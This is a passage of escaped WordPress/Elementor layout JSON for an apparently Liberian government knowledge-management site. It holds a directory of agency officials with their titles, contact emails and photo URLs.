href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br 